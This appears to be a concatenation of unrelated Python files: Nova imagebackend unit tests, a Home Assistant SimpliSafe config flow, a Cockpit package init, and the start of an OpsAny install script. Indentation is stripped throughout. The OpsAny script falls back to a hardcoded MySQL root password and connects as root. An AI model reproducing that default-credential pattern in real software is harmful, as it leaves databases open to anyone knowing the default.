if strip_brackets:
hosts = ["server1", "server2", "::1"]
else:
hosts = ["server1", "server2", "[::1]"]
ports = ["1899", "1920", "1930"]
return hosts, ports
mock_mon_addrs.side_effect = get_mon_addrs
image = self.image_class(self.INSTANCE, self.NAME)
model = image.get_model(FakeConn())
self.assertEqual(imgmodel.RBDImage(
self.INSTANCE["uuid"] + "_fake.vm",
"FakePool",
"FakeUser",
b"MTIzNDU2Cg==",
["server1:1899", "server2:1920", "[::1]:1930"]),
model)
@mock.patch.object(rbd_utils.RBDDriver, 'parent_info')
@mock.patch.object(rbd_utils.RBDDriver, 'flatten')
def test_flatten(self, mock_flatten, mock_parent_info):
image = self.image_class(self.INSTANCE, self.NAME)
image.flatten()
mock_flatten.assert_called_once_with(image.rbd_name, pool=self.POOL)
mock_parent_info.assert_called_once_with(
image.rbd_name, pool=self.POOL)
@mock.patch.object(imagebackend, 'LOG')
@mock.patch.object(rbd_utils.RBDDriver, 'parent_info')
@mock.patch.object(rbd_utils.RBDDriver, 'flatten')
def test_flatten_already_flat(
self, mock_flatten, mock_parent_info, mock_log):
mock_parent_info.side_effect = exception.ImageUnacceptable(
image_id=1, reason='foo')
image = self.image_class(self.INSTANCE, self.NAME)
image.flatten()
mock_log.debug.assert_called_once()
mock_flatten.assert_not_called()
mock_parent_info.assert_called_once_with(
image.rbd_name, pool=self.POOL)
def test_import_file(self):
image = self.image_class(self.INSTANCE, self.NAME)
@mock.patch.object(image, 'exists')
@mock.patch.object(image.driver, 'remove_image')
@mock.patch.object(image.driver, 'import_image')
def _test(mock_import, mock_remove, mock_exists):
mock_exists.return_value = True
image.import_file(self.INSTANCE, mock.sentinel.file,
mock.sentinel.remote_name)
name = '%s_%s' % (self.INSTANCE.uuid,
mock.sentinel.remote_name)
mock_exists.assert_called_once_with()
mock_remove.assert_called_once_with(name)
mock_import.assert_called_once_with(mock.sentinel.file, name)
_test()
@mock.patch.object(imagebackend.Rbd, 'exists')
@mock.patch.object(rbd_utils.RBDDriver, 'remove_image')
@mock.patch.object(rbd_utils.RBDDriver, 'import_image')
def test_import_file_not_found(self, mock_import, mock_remove,
mock_exists):
image = self.image_class(self.INSTANCE, self.NAME)
mock_exists.return_value = False
image.import_file(self.INSTANCE, mock.sentinel.file,
mock.sentinel.remote_name)
name = '%s_%s' % (self.INSTANCE.uuid,
mock.sentinel.remote_name)
mock_exists.assert_called_once_with()
self.assertFalse(mock_remove.called)
mock_import.assert_called_once_with(mock.sentinel.file, name)
def test_get_parent_pool(self):
image = self.image_class(self.INSTANCE, self.NAME)
with mock.patch.object(rbd_utils.RBDDriver, 'parent_info') as mock_pi:
mock_pi.return_value = [self.POOL, 'fake-image', 'fake-snap']
parent_pool = image._get_parent_pool(self.CONTEXT, 'fake-image',
self.FSID)
self.assertEqual(self.POOL, parent_pool)
def test_get_parent_pool_no_parent_info(self):
image = self.image_class(self.INSTANCE, self.NAME)
rbd_uri = 'rbd://%s/%s/fake-image/fake-snap' % (self.FSID, self.POOL)
with test.nested(mock.patch.object(rbd_utils.RBDDriver, 'parent_info'),
mock.patch.object(imagebackend.IMAGE_API, 'get'),
) as (mock_pi, mock_get):
mock_pi.side_effect = exception.ImageUnacceptable(image_id='test',
reason='test')
mock_get.return_value = {'locations': [{'url': rbd_uri}]}
parent_pool = image._get_parent_pool(self.CONTEXT, 'fake-image',
self.FSID)
self.assertEqual(self.POOL, parent_pool)
def test_get_parent_pool_non_local_image(self):
image = self.image_class(self.INSTANCE, self.NAME)
rbd_uri = 'rbd://remote-cluster/remote-pool/fake-image/fake-snap'
with test.nested(
mock.patch.object(rbd_utils.RBDDriver, 'parent_info'),
mock.patch.object(imagebackend.IMAGE_API, 'get')
) as (mock_pi, mock_get):
mock_pi.side_effect = exception.ImageUnacceptable(image_id='test',
reason='test')
mock_get.return_value = {'locations': [{'url': rbd_uri}]}
self.assertRaises(exception.ImageUnacceptable,
image._get_parent_pool, self.CONTEXT,
'fake-image', self.FSID)
def test_direct_snapshot(self):
image = self.image_class(self.INSTANCE, self.NAME)
test_snap = 'rbd://%s/%s/fake-image-id/snap' % (self.FSID, self.POOL)
with test.nested(
mock.patch.object(rbd_utils.RBDDriver, 'get_fsid',
return_value=self.FSID),
mock.patch.object(image, '_get_parent_pool',
return_value=self.POOL),
mock.patch.object(rbd_utils.RBDDriver, 'create_snap'),
mock.patch.object(rbd_utils.RBDDriver, 'clone'),
mock.patch.object(rbd_utils.RBDDriver, 'flatten'),
mock.patch.object(image, 'cleanup_direct_snapshot')
) as (mock_fsid, mock_parent, mock_create_snap, mock_clone,
mock_flatten, mock_cleanup):
location = image.direct_snapshot(self.CONTEXT, 'fake-snapshot',
'fake-format', 'fake-image-id',
'fake-base-image')
mock_fsid.assert_called_once_with()
mock_parent.assert_called_once_with(self.CONTEXT,
'fake-base-image',
self.FSID)
mock_create_snap.assert_has_calls([mock.call(image.rbd_name,
'fake-snapshot',
protect=True),
mock.call('fake-image-id',
'snap',
pool=self.POOL,
protect=True)])
mock_clone.assert_called_once_with(mock.ANY, 'fake-image-id',
dest_pool=self.POOL)
mock_flatten.assert_called_once_with('fake-image-id',
pool=self.POOL)
mock_cleanup.assert_called_once_with(mock.ANY)
self.assertEqual(test_snap, location)
def test_direct_snapshot_cleans_up_on_failures(self):
image = self.image_class(self.INSTANCE, self.NAME)
test_snap = 'rbd://%s/%s/%s/snap' % (self.FSID, image.driver.pool,
image.rbd_name)
with test.nested(
mock.patch.object(rbd_utils.RBDDriver, 'get_fsid',
return_value=self.FSID),
mock.patch.object(image, '_get_parent_pool',
return_value=self.POOL),
mock.patch.object(rbd_utils.RBDDriver, 'create_snap'),
mock.patch.object(rbd_utils.RBDDriver, 'clone',
side_effect=exception.Forbidden('testing')),
mock.patch.object(rbd_utils.RBDDriver, 'flatten'),
mock.patch.object(image, 'cleanup_direct_snapshot')) as (
mock_fsid, mock_parent, mock_create_snap, mock_clone,
mock_flatten, mock_cleanup):
self.assertRaises(exception.Forbidden, image.direct_snapshot,
self.CONTEXT, 'snap', 'fake-format',
'fake-image-id', 'fake-base-image')
mock_create_snap.assert_called_once_with(image.rbd_name, 'snap',
protect=True)
self.assertFalse(mock_flatten.called)
mock_cleanup.assert_called_once_with(dict(url=test_snap))
def test_cleanup_direct_snapshot(self):
image = self.image_class(self.INSTANCE, self.NAME)
test_snap = 'rbd://%s/%s/%s/snap' % (self.FSID, image.driver.pool,
image.rbd_name)
with test.nested(
mock.patch.object(rbd_utils.RBDDriver, 'remove_snap'),
mock.patch.object(rbd_utils.RBDDriver, 'destroy_volume')
) as (mock_rm, mock_destroy):
# Ensure that the method does nothing when no location is provided
image.cleanup_direct_snapshot(None)
self.assertFalse(mock_rm.called)
# Ensure that destroy_volume is not called
image.cleanup_direct_snapshot(dict(url=test_snap))
mock_rm.assert_called_once_with(image.rbd_name, 'snap', force=True,
ignore_errors=False,
pool=image.driver.pool)
self.assertFalse(mock_destroy.called)
def test_cleanup_direct_snapshot_destroy_volume(self):
image = self.image_class(self.INSTANCE, self.NAME)
test_snap = 'rbd://%s/%s/%s/snap' % (self.FSID, image.driver.pool,
image.rbd_name)
with test.nested(
mock.patch.object(rbd_utils.RBDDriver, 'remove_snap'),
mock.patch.object(rbd_utils.RBDDriver, 'destroy_volume')
) as (mock_rm, mock_destroy):
# Ensure that destroy_volume is called
image.cleanup_direct_snapshot(dict(url=test_snap),
also_destroy_volume=True)
mock_rm.assert_called_once_with(image.rbd_name, 'snap',
force=True,
ignore_errors=False,
pool=image.driver.pool)
mock_destroy.assert_called_once_with(image.rbd_name,
pool=image.driver.pool)
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_copy_to_store(self, mock_imgapi):
# Test copy_to_store() happy path where we ask for the image
# to be copied, it goes into progress and then completes.
self.flags(images_rbd_glance_copy_poll_interval=0,
group='libvirt')
self.flags(images_rbd_glance_store_name='store',
group='libvirt')
image = self.image_class(self.INSTANCE, self.NAME)
mock_imgapi.get.side_effect = [
# Simulate a race between starting the copy and the first poll
{'stores': []},
# Second poll shows it in progress
{'os_glance_importing_to_stores': ['store'],
'stores': []},
# Third poll shows it has also been copied to a non-local store
{'os_glance_importing_to_stores': ['store'],
'stores': ['other']},
# Should-be-last poll shows it complete
{'os_glance_importing_to_stores': [],
'stores': ['other', 'store']},
]
image.copy_to_store(self.CONTEXT, {'id': 'foo'})
mock_imgapi.copy_image_to_store.assert_called_once_with(
self.CONTEXT, 'foo', 'store')
self.assertEqual(4, mock_imgapi.get.call_count)
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_copy_to_store_race_with_existing(self, mock_imgapi):
# Test copy_to_store() where we race to ask Glance to do the
# copy with another node. One of us will get a BadRequest, which
# should not cause us to fail. If our desired store is now
# in progress, continue to wait like we would have if we had
# won the race.
self.flags(images_rbd_glance_copy_poll_interval=0,
group='libvirt')
self.flags(images_rbd_glance_store_name='store',
group='libvirt')
image = self.image_class(self.INSTANCE, self.NAME)
mock_imgapi.copy_image_to_store.side_effect = (
exception.ImageBadRequest(image_id='foo',
response='already in progress'))
# Make the first poll indicate that the image has already
# been copied
mock_imgapi.get.return_value = {'stores': ['store', 'other']}
# Despite the (expected) exception from the copy, we should
# not raise here if the subsequent poll works.
image.copy_to_store(self.CONTEXT, {'id': 'foo'})
mock_imgapi.get.assert_called_once_with(self.CONTEXT,
'foo',
include_locations=True)
mock_imgapi.copy_image_to_store.assert_called_once_with(
self.CONTEXT, 'foo', 'store')
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_copy_to_store_import_impossible(self, mock_imgapi):
# Test copy_to_store() where Glance tells us that the image
# is not copy-able for some reason (like it is not active yet
# or some other workflow reason).
image = self.image_class(self.INSTANCE, self.NAME)
mock_imgapi.copy_image_to_store.side_effect = (
exception.ImageImportImpossible(image_id='foo',
reason='because tests'))
self.assertRaises(exception.ImageUnacceptable,
image.copy_to_store,
self.CONTEXT, {'id': 'foo'})
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_copy_to_store_import_failed_other_reason(self, mock_imgapi):
# Test copy_to_store() where some unexpected failure gets raised.
# We should bubble that up so it gets all the way back to the caller
# of the clone() itself, which can handle it independent of one of
# the image-specific exceptions.
image = self.image_class(self.INSTANCE, self.NAME)
mock_imgapi.copy_image_to_store.side_effect = test.TestingException
# Make sure any other exception makes it through, as those are already
# expected failures by the callers of the imagebackend code.
self.assertRaises(test.TestingException,
image.copy_to_store,
self.CONTEXT, {'id': 'foo'})
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_copy_to_store_import_failed_in_progress(self, mock_imgapi):
# Test copy_to_store() in the situation where we ask for the copy,
# things start to look good (in progress) and later get reported
# as failed.
self.flags(images_rbd_glance_copy_poll_interval=0,
group='libvirt')
self.flags(images_rbd_glance_store_name='store',
group='libvirt')
image = self.image_class(self.INSTANCE, self.NAME)
mock_imgapi.get.side_effect = [
# First poll shows it in progress
{'os_glance_importing_to_stores': ['store'],
'stores': []},
# Second poll shows it failed
{'os_glance_failed_import': ['store'],
'stores': []},
]
exc = self.assertRaises(exception.ImageUnacceptable,
image.copy_to_store,
self.CONTEXT, {'id': 'foo'})
self.assertIn('unsuccessful because', str(exc))
@mock.patch.object(loopingcall.FixedIntervalWithTimeoutLoopingCall,
'start')
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_copy_to_store_import_failed_timeout(self, mock_imgapi,
mock_timer_start):
# Test copy_to_store() simulating the case where we timeout waiting
# for Glance to do the copy.
self.flags(images_rbd_glance_store_name='store',
group='libvirt')
image = self.image_class(self.INSTANCE, self.NAME)
mock_timer_start.side_effect = loopingcall.LoopingCallTimeOut()
exc = self.assertRaises(exception.ImageUnacceptable,
image.copy_to_store,
self.CONTEXT, {'id': 'foo'})
self.assertIn('timed out', str(exc))
mock_imgapi.copy_image_to_store.assert_called_once_with(
self.CONTEXT, 'foo', 'store')
@mock.patch('nova.storage.rbd_utils.RBDDriver')
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_clone_copy_to_store(self, mock_imgapi, mock_driver_):
# Call image.clone() in a way that will cause it to fall through
# the locations check to the copy-to-store behavior, and assert
# that after the copy, we recurse (without becoming infinite) and
# do the check again.
self.flags(images_rbd_glance_store_name='store', group='libvirt')
fake_image = {
'id': 'foo',
'disk_format': 'raw',
'locations': ['fake'],
}
mock_imgapi.get.return_value = fake_image
mock_driver = mock_driver_.return_value
mock_driver.is_cloneable.side_effect = [False, True]
image = self.image_class(self.INSTANCE, self.NAME)
with mock.patch.object(image, 'copy_to_store') as mock_copy:
image.clone(self.CONTEXT, 'foo')
mock_copy.assert_called_once_with(self.CONTEXT, fake_image)
mock_driver.is_cloneable.assert_has_calls([
# First call is the initial check
mock.call('fake', fake_image),
# Second call with the same location must be because we
# recursed after the copy-to-store operation
mock.call('fake', fake_image)])
@mock.patch('nova.storage.rbd_utils.RBDDriver')
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_clone_copy_to_store_failed(self, mock_imgapi, mock_driver_):
# Call image.clone() in a way that will cause it to fall through
# the locations check to the copy-to-store behavior, but simulate
# some situation where we didn't actually copy the image and the
# recursed check does not succeed. Assert that we do not copy again,
# nor recurse again, and raise the expected error.
self.flags(images_rbd_glance_store_name='store', group='libvirt')
fake_image = {
'id': 'foo',
'disk_format': 'raw',
'locations': ['fake'],
}
mock_imgapi.get.return_value = fake_image
mock_driver = mock_driver_.return_value
mock_driver.is_cloneable.side_effect = [False, False]
image = self.image_class(self.INSTANCE, self.NAME)
with mock.patch.object(image, 'copy_to_store') as mock_copy:
self.assertRaises(exception.ImageUnacceptable,
image.clone, self.CONTEXT, 'foo')
mock_copy.assert_called_once_with(self.CONTEXT, fake_image)
mock_driver.is_cloneable.assert_has_calls([
# First call is the initial check
mock.call('fake', fake_image),
# Second call with the same location must be because we
# recursed after the copy-to-store operation
mock.call('fake', fake_image)])
@mock.patch('nova.storage.rbd_utils.RBDDriver')
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_clone_without_needed_copy(self, mock_imgapi, mock_driver_):
# Call image.clone() in a way that will cause it to pass the locations
# check the first time. Assert that we do not call copy-to-store
# nor recurse.
self.flags(images_rbd_glance_store_name='store', group='libvirt')
fake_image = {
'id': 'foo',
'disk_format': 'raw',
'locations': ['fake'],
}
mock_imgapi.get.return_value = fake_image
mock_driver = mock_driver_.return_value
mock_driver.is_cloneable.return_value = True
image = self.image_class(self.INSTANCE, self.NAME)
with mock.patch.object(image, 'copy_to_store') as mock_copy:
image.clone(self.CONTEXT, 'foo')
mock_copy.assert_not_called()
mock_driver.is_cloneable.assert_called_once_with('fake', fake_image)
@mock.patch('nova.storage.rbd_utils.RBDDriver')
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_clone_copy_not_configured(self, mock_imgapi, mock_driver_):
# Call image.clone() in a way that will cause it to fail the locations
# check the first time. Assert that if the store name is not configured
# we do not try to copy-to-store and just raise the original exception
# indicating that the image is not reachable.
fake_image = {
'id': 'foo',
'disk_format': 'raw',
'locations': ['fake'],
}
mock_imgapi.get.return_value = fake_image
mock_driver = mock_driver_.return_value
mock_driver.is_cloneable.return_value = False
image = self.image_class(self.INSTANCE, self.NAME)
with mock.patch.object(image, 'copy_to_store') as mock_copy:
self.assertRaises(exception.ImageUnacceptable,
image.clone, self.CONTEXT, 'foo')
mock_copy.assert_not_called()
mock_driver.is_cloneable.assert_called_once_with('fake', fake_image)
class PloopTestCase(_ImageTestCase, test.NoDBTestCase):
SIZE = 1024
def setUp(self):
self.image_class = imagebackend.Ploop
super(PloopTestCase, self).setUp()
self.utils = imagebackend.utils
@mock.patch.object(imagebackend.fileutils, 'ensure_tree')
@mock.patch.object(os.path, 'exists')
def test_cache(self, mock_exists, mock_ensure):
mock_exists.side_effect = [False, False, False]
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH), mock.call(self.TEMPLATE_PATH)]
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
mock_ensure.assert_called_once_with(self.TEMPLATE_DIR)
mock_exists.assert_has_calls(exist_calls)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
@mock.patch.object(imagebackend.Ploop, 'get_disk_size',
return_value=2048)
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch('nova.virt.libvirt.utils.copy_image')
@mock.patch('nova.privsep.libvirt.ploop_restore_descriptor')
@mock.patch.object(imagebackend.disk, 'extend')
def test_create_image(self, mock_extend, mock_ploop_restore_descriptor,
mock_copy, mock_sync, mock_get):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
fn = mock.MagicMock()
img_path = os.path.join(self.PATH, "root.hds")
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, 2048, image_id=None)
mock_copy.assert_called_once_with(self.TEMPLATE_PATH, img_path)
mock_ploop_restore_descriptor.assert_called_once_with(self.PATH,
img_path,
"raw")
self.assertTrue(mock_sync.called)
fn.assert_called_once_with(target=self.TEMPLATE_PATH, image_id=None)
mock_extend.assert_called_once_with(
imgmodel.LocalFileImage(self.PATH, imgmodel.FORMAT_PLOOP),
2048)
def test_create_image_generated(self):
fn = mock.Mock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, 2048, ephemeral_size=2)
fn.assert_called_with(target=self.PATH,
ephemeral_size=2)
def test_prealloc_image(self):
self.flags(preallocate_images='space')
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
def fake_fetch(target, *args, **kwargs):
return
self.stub_out('os.path.exists', lambda _: True)
self.stub_out('nova.virt.libvirt.imagebackend.Ploop.exists',
lambda *a, **kw: True)
self.stub_out('nova.virt.libvirt.imagebackend.Ploop.get_disk_size',
lambda *a, **kw: self.SIZE)
image.cache(fake_fetch, self.TEMPLATE_PATH, self.SIZE)
class BackendTestCase(test.NoDBTestCase):
INSTANCE = objects.Instance(id=1, uuid=uuidutils.generate_uuid())
NAME = 'fake-name.suffix'
def setUp(self):
super(BackendTestCase, self).setUp()
self.flags(enabled=False, group='ephemeral_storage_encryption')
self.flags(instances_path=self.useFixture(fixtures.TempDir()).path)
self.INSTANCE['ephemeral_key_uuid'] = None
def get_image(self, use_cow, image_type):
return imagebackend.Backend(use_cow).by_name(self.INSTANCE, self.NAME,
image_type)
def _test_image(self, image_type, image_not_cow, image_cow):
image1 = self.get_image(False, image_type)
image2 = self.get_image(True, image_type)
def assertIsInstance(instance, class_object):
failure = ('Expected %s,' +
' but got %s.') % (class_object.__name__,
instance.__class__.__name__)
self.assertIsInstance(instance, class_object, msg=failure)
assertIsInstance(image1, image_not_cow)
assertIsInstance(image2, image_cow)
def test_image_flat(self):
self._test_image('raw', imagebackend.Flat, imagebackend.Flat)
def test_image_flat_preallocate_images(self):
self.flags(preallocate_images='space')
raw = imagebackend.Flat(self.INSTANCE, 'fake_disk', '/tmp/xyz')
self.assertTrue(raw.preallocate)
def test_image_flat_native_io(self):
self.flags(preallocate_images="space")
raw = imagebackend.Flat(self.INSTANCE, 'fake_disk', '/tmp/xyz')
self.assertEqual(raw.driver_io, "native")
def test_image_qcow2(self):
self._test_image('qcow2', imagebackend.Qcow2, imagebackend.Qcow2)
def test_image_qcow2_preallocate_images(self):
self.flags(preallocate_images='space')
qcow = imagebackend.Qcow2(self.INSTANCE, 'fake_disk', '/tmp/xyz')
self.assertTrue(qcow.preallocate)
def test_image_qcow2_native_io(self):
self.flags(preallocate_images="space")
qcow = imagebackend.Qcow2(self.INSTANCE, 'fake_disk', '/tmp/xyz')
self.assertEqual(qcow.driver_io, "native")
def test_image_lvm_native_io(self):
def _test_native_io(is_sparse, driver_io):
self.flags(images_volume_group='FakeVG', group='libvirt')
self.flags(sparse_logical_volumes=is_sparse, group='libvirt')
lvm = imagebackend.Lvm(self.INSTANCE, 'fake_disk')
self.assertEqual(lvm.driver_io, driver_io)
_test_native_io(is_sparse=False, driver_io="native")
_test_native_io(is_sparse=True, driver_io=None)
def test_image_lvm(self):
self.flags(images_volume_group='FakeVG', group='libvirt')
self._test_image('lvm', imagebackend.Lvm, imagebackend.Lvm)
@mock.patch.object(rbd_utils, 'rbd')
@mock.patch.object(rbd_utils, 'rados')
def test_image_rbd(self, mock_rados, mock_rbd):
conf = "FakeConf"
pool = "FakePool"
self.flags(images_rbd_pool=pool, group='libvirt')
self.flags(images_rbd_ceph_conf=conf, group='libvirt')
self._test_image('rbd', imagebackend.Rbd, imagebackend.Rbd)
def test_image_default(self):
self._test_image('default', imagebackend.Flat, imagebackend.Qcow2)
class UtimeWorkaroundTestCase(test.NoDBTestCase):
ERROR_STUB = "sentinel.path: [Errno 13] Permission Denied"
def setUp(self):
super(UtimeWorkaroundTestCase, self).setUp()
self.mock_utime = self.useFixture(
fixtures.MockPatch('nova.privsep.path.utime')).mock
def test_update_utime_no_error(self):
# If utime doesn't raise an error we shouldn't raise or log anything
imagebackend._update_utime_ignore_eacces(mock.sentinel.path)
self.mock_utime.assert_called_once_with(mock.sentinel.path)
self.assertNotIn(self.ERROR_STUB, self.stdlog.logger.output)
def test_update_utime_eacces(self):
# If utime raises EACCES we should log the error, but ignore it
e = OSError()
e.errno = errno.EACCES
e.strerror = "Permission Denied"
self.mock_utime.side_effect = e
imagebackend._update_utime_ignore_eacces(mock.sentinel.path)
self.mock_utime.assert_called_once_with(mock.sentinel.path)
self.assertIn(self.ERROR_STUB, self.stdlog.logger.output)
def test_update_utime_eio(self):
# If utime raises any other error we should raise it
e = OSError()
e.errno = errno.EIO
e.strerror = "IO Error"
self.mock_utime.side_effect = e
ex = self.assertRaises(
OSError, imagebackend._update_utime_ignore_eacces,
mock.sentinel.path)
self.assertIs(ex, e)
self.mock_utime.assert_called_once_with(mock.sentinel.path)
self.assertNotIn(self.ERROR_STUB, self.stdlog.logger.output)
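# The UtimeWorkaroundTestCase above pins down the behaviour expected from
# imagebackend._update_utime_ignore_eacces: EACCES is logged and swallowed,
# while any other OSError propagates. A minimal sketch consistent with those
# assertions (not necessarily Nova's actual implementation) would be:
#
#     def _update_utime_ignore_eacces(path):
#         try:
#             nova.privsep.path.utime(path)
#         except OSError as e:
#             if e.errno != errno.EACCES:
#                 raise
#             LOG.debug("Ignoring utime failure for %s: %s", path, e.strerror)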
|
"""Config flow to configure the SimpliSafe component."""
from simplipy import API
from simplipy.errors import SimplipyError
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.const import CONF_CODE, CONF_PASSWORD, CONF_TOKEN, CONF_USERNAME
from homeassistant.core import callback
from homeassistant.helpers import aiohttp_client
from .const import DOMAIN # pylint: disable=unused-import
class SimpliSafeFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a SimpliSafe config flow."""
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_CLOUD_POLL
def __init__(self):
"""Initialize the config flow."""
self.data_schema = vol.Schema(
{
vol.Required(CONF_USERNAME): str,
vol.Required(CONF_PASSWORD): str,
vol.Optional(CONF_CODE): str,
}
)
async def _show_form(self, errors=None):
"""Show the form to the user."""
return self.async_show_form(
step_id="user",
data_schema=self.data_schema,
errors=errors if errors else {},
)
@staticmethod
@callback
def async_get_options_flow(config_entry):
"""Define the config flow to handle options."""
return SimpliSafeOptionsFlowHandler(config_entry)
async def async_step_import(self, import_config):
"""Import a config entry from configuration.yaml."""
return await self.async_step_user(import_config)
async def async_step_user(self, user_input=None):
"""Handle the start of the config flow."""
if not user_input:
return await self._show_form()
await self.async_set_unique_id(user_input[CONF_USERNAME])
self._abort_if_unique_id_configured()
websession = aiohttp_client.async_get_clientsession(self.hass)
try:
simplisafe = await API.login_via_credentials(
user_input[CONF_USERNAME], user_input[CONF_PASSWORD], websession
)
except SimplipyError:
return await self._show_form(errors={"base": "invalid_credentials"})
return self.async_create_entry(
title=user_input[CONF_USERNAME],
data={
CONF_USERNAME: user_input[CONF_USERNAME],
CONF_TOKEN: simplisafe.refresh_token,
CONF_CODE: user_input.get(CONF_CODE),
},
)
class SimpliSafeOptionsFlowHandler(config_entries.OptionsFlow):
"""Handle a SimpliSafe options flow."""
def __init__(self, config_entry):
"""Initialize."""
self.config_entry = config_entry
async def async_step_init(self, user_input=None):
"""Manage the options."""
if user_input is not None:
return self.async_create_entry(title="", data=user_input)
return self.async_show_form(
step_id="init",
data_schema=vol.Schema(
{
vol.Optional(
CONF_CODE, default=self.config_entry.options.get(CONF_CODE),
): str
}
),
)
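# A hedged sketch of how the data saved by this flow is typically consumed:
# the integration's async_setup_entry can read the stored token and the
# optional alarm code from the entry, preferring options set via
# SimpliSafeOptionsFlowHandler. The function below is illustrative only.
#
#     async def async_setup_entry(hass, entry):
#         token = entry.data[CONF_TOKEN]
#         code = entry.options.get(CONF_CODE, entry.data.get(CONF_CODE))
#         ...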
|
"""Init for Cockpit."""
from pkg_resources import DistributionNotFound, get_distribution
from cockpit.cockpit import Cockpit
from cockpit.plotter import CockpitPlotter
# Extract the version number, for accessing it via __version__
try:
# Change here if project is renamed and does not equal the package name
dist_name = __name__
__version__ = get_distribution(dist_name).version
except DistributionNotFound:
__version__ = "unknown"
finally:
del get_distribution, DistributionNotFound
__all__ = ["Cockpit", "CockpitPlotter", "__version__", "cockpit.quantities"]
|
"""
mysql-connector==2.2.9
SQLAlchemy==1.4.22
"""
import os
import sys
import datetime
import configparser
from sqlalchemy import Column, DateTime, ForeignKey, String, create_engine, Index
from sqlalchemy.dialects.mysql import INTEGER, LONGTEXT, SMALLINT, TINYINT
from sqlalchemy.orm import relationship, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from urllib import parse
# change working directory to the install directory
os.chdir('../install')
# verify that the config file exists
if not os.path.exists('install.config'):
    sys.exit('install.config does not exist.')
read_install_config = configparser.ConfigParser()
try:
read_install_config.read('install.config')
config_dict = dict(read_install_config)
except Exception as e:
print(e)
    sys.exit('install.config content could not be parsed.')
def replace_str(data):
if not data:
return None
return data.replace("\"", "").replace("\'", "")
MYSQL_SERVER_IP = replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP", "127.0.0.1"))
MYSQL_ROOT_PASSWORD = replace_str(config_dict.get("mysql").get("MYSQL_ROOT_PASSWORD", "OpsAny@2020"))
try:
db = create_engine("mysql+mysqlconnector://root:{}@{}/opsany_paas".format(parse.quote_plus(MYSQL_ROOT_PASSWORD), MYSQL_SERVER_IP))
Base = declarative_base(db)
def to_dict(self):
return {c.name: getattr(self, c.name, None)
for c in self.__table__.columns}
Base.to_dict = to_dict
except Exception as e:
print("Script error: {}".format(str(e)))
    sys.exit('Failed to connect to MySQL. Please check the MySQL server!')
envs = [
{
"app_code": "cmdb",
"env": [
# CMDB count 8
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_CMDB_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "MONGO_HOST", "value": replace_str(config_dict.get('mongodb').get("MONGO_SERVER_IP")), "env_scope": "all", "intro": "mongo host"},
{"key": "MONGO_PORT", "value": replace_str(config_dict.get('mongodb').get("MONGO_PORT")), "env_scope": "all", "intro": "mongo port"},
{"key": "MONGO_PASSWORD", "value": replace_str(config_dict.get('mongodb').get("MONGO_CMDB_PASSWORD")), "env_scope": "all", "intro": "mongo password"},
# {"key": "DEFAULT_USER_ICON", "value": read_install_config.get("DEFAULT_USER_ICON"), "env_scope": "all", "intro": "user default icon"},
]
},{
"app_code": "cmp",
"env": [
# CMP count 7
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_CMP_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "MONGO_HOST", "value": replace_str(config_dict.get('mongodb').get("MONGO_SERVER_IP")), "env_scope": "all", "intro": "mongo host"},
{"key": "MONGO_PORT", "value": replace_str(config_dict.get('mongodb').get("MONGO_PORT")), "env_scope": "all", "intro": "mongo port"},
{"key": "MONGO_PASSWORD", "value": replace_str(config_dict.get('mongodb').get("MONGO_CMP_PASSWORD")), "env_scope": "all", "intro": "mongo password"},
# {"key": "DEFAULT_USER_ICON", "value": read_install_config.get("DEFAULT_USER_ICON"), "env_scope": "all", "intro": "user default icon"},
]
},{
"app_code": "job",
"env": [
# JOB count 10
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_JOB_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
